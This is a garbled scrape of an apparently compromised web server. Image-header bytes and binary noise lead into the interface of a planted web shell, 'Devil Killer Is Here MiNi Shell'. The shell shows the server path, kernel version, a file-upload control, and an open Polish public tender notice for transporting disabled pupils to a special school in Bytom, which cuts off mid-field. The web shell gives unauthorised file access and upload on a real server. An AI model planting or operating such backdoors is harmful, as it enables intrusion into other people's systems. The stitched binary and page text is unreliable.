JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230530/0023998201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów na zajęcia szkolne do Szkoły Podstawowej Specjalnej nr 40 w Bytomiu wraz z powrotem w roku szkolnym 2023/2024 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa Specjalna nr 40 im. Gustawa Morcinka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000724896</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Orląt Lwowskich 12b</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bytom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-902</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">322811827</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@sps40.bytom.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sps40.bytom.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów na zajęcia szkolne do Szkoły Podstawowej Specjalnej nr 40 w Bytomiu wraz z powrotem w roku szkolnym 2023/2024 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-472b6d4f-fed9-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00239982</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00187134/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 dowóz uczniów niepełnosprawnych do szkoły</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-472b6d4f-fed9-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-472b6d4f-fed9-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. <br/>2. Zamawiający zaleca wykonawcy posiadanie konta na platformie. Instrukcje dotyczące korzystania z platformy (rejestracji,<br/>wymagań technicznych, zadawania pytań do postępowania, udziału w postępowaniu, w tym składania oferty) dostępne są pod<br/>wskazanym powyżej adresem w zakładce instrukcje. Skuteczne przekazanie pytania przez użytkownika niezalogowanego wymaga<br/>potwierdzenia informacji otrzymanej na skrzynkę mailową.<br/>3. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy pomocy protokołu SSL. Certyfikat<br/>SSL zapewnia poufność transmisji danych przesyłanych przez Internet.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem platformy wynosi 150 MB. Większe pliki zaleca się skompresować do<br/>jednego pliku archiwum (ZIP) w celu nieprzekroczenia ww. wielkości. Zamawiający informuje, iż w oparciu o zapisy pkt 4 załącznika<br/>nr 2 do rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów<br/>publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformacyjnych nie<br/>dopuszcza kompresji pliku archiwum w formacie RAR. W przypadku próby zastosowania formatu kompresji RAR nie będzie możliwe<br/>jego złożenie za pomocą platformy.<br/>5. Czas zapisany jest w formacie YYYY-MM-DD HH:MM:SS.<br/>6. Zamawiający dopuszcza komunikację poprzez pocztę elektroniczną. Adres poczty elektronicznej zamawiającego:<br/>zamowienia@um.bytom.pl. Limit rozmiaru załączników przesyłanych pocztą elektroniczną wynosi łącznie 19 MB. Jednocześnie<br/>zamawiający zastrzega, że ofertę należy złożyć wyłącznie za pośrednictwem platformy. Przekazanie korespondencji poprzez pocztę<br/>elektroniczną wymaga na żądanie każdej ze stron niezwłocznego potwierdzenia faktu jej otrzymania.<br/>7. Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści specyfikacji warunków zamówienia.<br/>Zamawiający prosi o przesyłanie zapytań do treści SWZ w wersji edytowalnej.<br/>8. Zamawiający udzieli wyjaśnień zgodnie z art. 284 ustawy Pzp. Zmiany i wyjaśnienia treści SWZ udostępniane będą na Platformie,<br/>zgodnie z pkt 1.<br/>9. W przypadku, gdy do przystępują Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, wszelka korespondencja<br/>prowadzona będzie wyłącznie z pełnomocnikiem (liderem) konsorcjum.<br/>Oferta winna być – pod rygorem nieważności – złożona w formie elektronicznej (opatrzona kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych.<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: sekretariat@sps40.bytom.pl (nie dotyczy składania ofert ).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest Szkołą Podstzwowa Specjalna nr 40 z siedzibą w Bytomiu, przy ul. Orląt Lwowskich 12b, 41 – 902 Bytom<br/>2) dane kontaktowe inspektora ochrony danych osobowych w Gminie Bytom: Urząd Miejski w Bytomiu, ul. Smolenia 35, 41-902 Bytom, mail: iod_edu@um.bytom.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego (a w przypadku dokonania wyboru złożonej oferty jako najkorzystniejszej i zawarciu umowy, także w celu związanym z realizacją zamówienia);<br/>4) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz <br/>art. 74 ustawy Pzp;<br/>5) Pani/Pana dane osobowe będą przechowywane do czasu zniszczenia dokumentacji postępowania zgodnie z obowiązującymi przepisami prawa lub umową o dofinansowanie, lecz nie krócej niż przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy (zgodnie z art. 78 ust. 4 ustawy Pzp);<br/>6)Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Pz;.<br/>7)W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art.22 RODO;<br/>8) Posiada Pani/Pan:<br/>a)	na podstawie art.15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b)	na podstawie art.16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/>* skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników<br/>c) na podstawie art.18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art.18 ust.2 RODO **;<br/>** prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, których mowa w art.20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art.6 ust.1 lit. c RODO;<br/>10)	Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku <br/>z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska <br/>od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO;<br/>11)	Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp;<br/>12)	W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SPS 40.261.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dowożenie uczniów niepełnosprawnych wraz <br/>z oiekunem na zajęcia do Szkoły Podstawowej Specjalnej nr 40 w Bytomiu wraz z powrotem w roku szkolnym 2023/2024. Opiekuna zapewnia Zamawiający – zgodnie z opisem poszczególnych części/tras.<br/>2.	Wykonawca jest zobowiązany do dysponowania co najmniej jednym środkiem transportu, innym dla każdej z tras na którą złoży ofertę. Środki transportu wykorzystywane do realizacji zamówienia nie mogą być wyprodukowane przed 2005 rokiem. Zaoferowanie do realizacji zamówienia pojazdów nowszych będzie oceniane w ramach kryteriów oceny ofert. W przypadku awarii środka transportu w trakcie realizacji zamówienia wykonawca zobowiązany będzie do podstawienia pojazdu zastępczego w czasie maksymalnie do 60 minut. Skrócenie czasu podstawienia pojazdu zastępczego będzie oceniane w ramach kryteriów oceny ofert.<br/><br/>3.	Zamówienie zostało podzielone na cztery części (trasy)<br/> Transport do Szkoły Podstawowej Specjalnej nr 40 <br/>Część (trasa) I- Bytom Śródmieście Szkoła Podstawowa Specjalna nr 40, Orląt lwowskich 12b  Bytom Łagiewnicka 17 Bytom, ul. Krzyżowa 32 (przystanek) Bytom Łagiewniki, ul. Ostania (przystanek)  Bytom Szombierki, ul. Grota Roweckiego 41(przystanek)  Bytom Bobrek, (przystanek) Huta Julia  Bytom Racławicka 10 Bytom Śródmieście Szkoła, Orląt lwowskich 12b<br/>Powrót tą samą trasą po zakończeniu zajęć szkolnych. <br/>Maksymalnie: 44 km/dzień<br/>Ilość uczniów: 20 (na dzień opracowania opisu przedmiotu zamówienia) + opiekun – ZAPEWNIA ZAMAWIAJĄCY </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-04 do 2024-06-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Ocena ofert zostanie dokonana wg następujących zasad:<br/>2.1. dla kryterium – cena (X1)<br/>Maksymalna ilość punktów do zdobycia w tym kryterium: 60 pkt<br/><br/> najniższa oferowana cena <br/> ilość pkt przyznana danej ofercie = ------------------------------------- x 60 pkt <br/> badana cena <br/> <br/>2.2. dla kryterium – rok produkcji samochodu (X2)<br/>1) Wykonawca jest zobowiązany do dysponowania co najmniej jednym środkiem transportu, innym dla każdej z tras na którą złoży ofertę.<br/>2) W przypadku wskazania co najmniej dwóch takich samych pojazdów (nr rejestracyjnych) Zamawiający uzna to jako sprzeczność z treścią sw i oferta taka zostanie odrzucona. <br/>3) Maksymalna ilość punktów do zdobycia w tym kryterium: 20 pkt<br/> Punkty będą przyznawane w następujący sposób: <br/>rok produkcji: 2005 - 2007	- 0 pkt<br/>rok produkcji: 2008- 2010	- 5 pkt<br/>rok produkcji: 2011 - 2013	- 10 pkt<br/>rok produkcji: 2014 - 2016	- 15 pkt<br/>rok produkcji: 2017 - 2023	- 20 pkt<br/>4)	Zaoferowanie pojazdu wyprodukowanego przed 2005 r. Zamawiający uzna jako sprzeczność z treścią swz i oferta taka zostanie odrzucona. <br/>5)	W przypadku wskazania więcej niż jednego samochodu dla danej trasy punkty zostaną przyznane za najnowszy samochód (zostanie on wpisany do umowy).<br/><br/>2.3. dla kryterium – Czas podstawienia pojazdu zastępczego (X3)<br/>1)	Wykonawca zobowiązany jest do podstawienia pojazdu zastępczego w podanym czasie od momentu zawiadomienia zgodnego z zapisami umowy, o okoliczności uzasadniającej konieczność podstawienia pojazdu zastępczego (np. awaria). Pojazd zastępczy musi spełniać wymagania Zamawiającego określone<br/>w specyfikacji warunków zamówienia i podane w ofercie wykonawcy.<br/>2)	Maksymalna ilość punktów do zdobycia w tym kryterium: 20 pkt<br/>3)	Punkty będą przyznawane w następujący sposób:<br/><br/>podstawienie pojazdu zastępczego do 20 minut - 20 pkt<br/>podstawienie pojazdu zastępczego od 21 do 30 minut	– 15 pkt<br/>podstawienie pojazdu zastępczego od 31 do 40 minut	– 10 pkt<br/>podstawienie pojazdu zastępczego od 41 do 50 minut	– 5 pkt<br/>podstawienie pojazdu zastępczego od 51 do 60 minut	- 0 pkt<br/><br/>4)	Zaoferowanie czasu podstawienia pojazdu zastępczego dłuższego niż 60 minut będzie niezgodne z treścią niniejszej specyfikacji i oferta będzie podlegała odrzuceniu. Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku.<br/><br/>3.	Zamawiający zastosuje zaokrąglenie wyniku do dwóch miejsc po przecinku<br/>4.	Za najkorzystniejszą w danej części zostanie uznana oferta, która spośród ofert niepodlegających odrzuceniu uzyska największą ilość punktów.<br/>5.	W przypadku wystąpienia omyłek w złożonej ofercie (formularzu oferty), Zamawiający przyjmie za prawidłową cenę jednego wozokilometra. <br/>6.	Ocena punktowa przyznana ofercie (X) będzie sumą punktów przyznanych w ramach kryteriów oceny ofert i zostanie obliczona, jako X = X1 + X2 + X3. Oceny punktowe uzyskane dla poszczególnych tras, zostaną zsumowane i suma ta stanowić będzie końcowa ocenę badanej oferty.<br/>7.	Punktacja przyznana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/>8.	Za najkorzystniejszą ofertę zostanie uznana oferta niepodlegająca odrzuceniu, która otrzyma największą ilość punktów zgodnie z kryteriami oceny ofert oraz sposobem ich oceny, określonym powyżej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji samochodu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dowożenie uczniów niepełnosprawnych wraz <br/>z oiekunem na zajęcia do Szkoły Podstawowej Specjalnej nr 40 w Bytomiu wraz z powrotem w roku szkolnym 2023/2024. Opiekuna zapewnia Zamawiający – zgodnie z opisem poszczególnych części/tras.<br/>2.	Wykonawca jest zobowiązany do dysponowania co najmniej jednym środkiem transportu, innym dla każdej z tras na którą złoży ofertę. Środki transportu wykorzystywane do realizacji zamówienia nie mogą być wyprodukowane przed 2005 rokiem. Zaoferowanie do realizacji zamówienia pojazdów nowszych będzie oceniane w ramach kryteriów oceny ofert. W przypadku awarii środka transportu w trakcie realizacji zamówienia wykonawca zobowiązany będzie do podstawienia pojazdu zastępczego w czasie maksymalnie do 60 minut. Skrócenie czasu podstawienia pojazdu zastępczego będzie oceniane w ramach kryteriów oceny ofert.<br/>Część (trasa) II - Bytom Śródmieście Szkoła Podstawowa Specjalna nr 40, Orląt lwowskich 12b  Bytom, Morcinka 13  Bytom, Biedronka Pułaskiego 65  Bytom ul. Didura 13  Bytom, ul. Moniuszki 21 (Opera)  Bytom Siemianowicka 105b  Bytom Śródmieście Szkoła Podstawowa Specjalna nr 40, Orląt lwowskich 12b Powrót tą samą trasą po zakończeniu zajęć szkolnych. <br/>Maksymalnie: 30 km/dzień<br/>Ilość uczniów: 19 (na dzień opracowania opisu przedmiotu zamówienia) + opiekun – <br/>ZAPEWNIA ZAMAWIAJĄCY </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-09-04 do 